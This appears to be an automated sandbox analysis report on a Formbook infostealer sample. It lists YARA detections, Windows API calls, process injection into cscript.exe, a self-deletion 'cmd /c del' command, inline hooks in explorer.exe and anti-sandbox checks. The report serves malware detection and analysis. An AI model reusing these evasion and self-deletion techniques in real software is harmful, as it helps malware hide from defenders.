            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: z7d1ehQQQW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_00867C03
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_0086502D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_02A8C124
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_02A8E562
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_02A8E570
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_00868831
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00401030
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041E993
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00402D8A
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00402D90
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409E30
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041DFD0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00402FB0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E9502D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E97C03
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E98831
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BF900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B0D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04981D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D6E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 048BB150 appears 32 times
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419D50 NtCreateFile,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419E00 NtReadFile,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419E80 NtClose,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419D4A NtCreateFile,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419E7C NtClose,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419F2A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69E80 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69E00 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69F30 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69D50 NtCreateFile,
            Source: z7d1ehQQQW.exe, 00000000.00000002.681699947.0000000007280000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.674788458.000000000090A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.735136542.0000000000F3A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exeBinary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: z7d1ehQQQW.exeVirustotal: Detection: 24%
            Source: z7d1ehQQQW.exeReversingLabs: Detection: 13%
            Source: z7d1ehQQQW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z7d1ehQQQW.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/2
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: z7d1ehQQQW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z7d1ehQQQW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: z7d1ehQQQW.exe, CalendarId/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_00867C03 push es; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_004178AB pushfd ; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0040E27F push edx; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409BD5 push esp; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_004175F8 push edx; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419DA2 pushad ; retf
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041660F push edx; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CEF2 push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CEFB push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CEA5 push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CF5C push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E97C03 push es; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0490D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D5E27F push edx; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D59BD5 push esp; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D678AB pushfd ; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.61448564553

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEF
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.z7d1ehQQQW.exe.2d13274.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z7d1ehQQQW.exe PID: 984, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002D598E4 second address: 0000000002D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
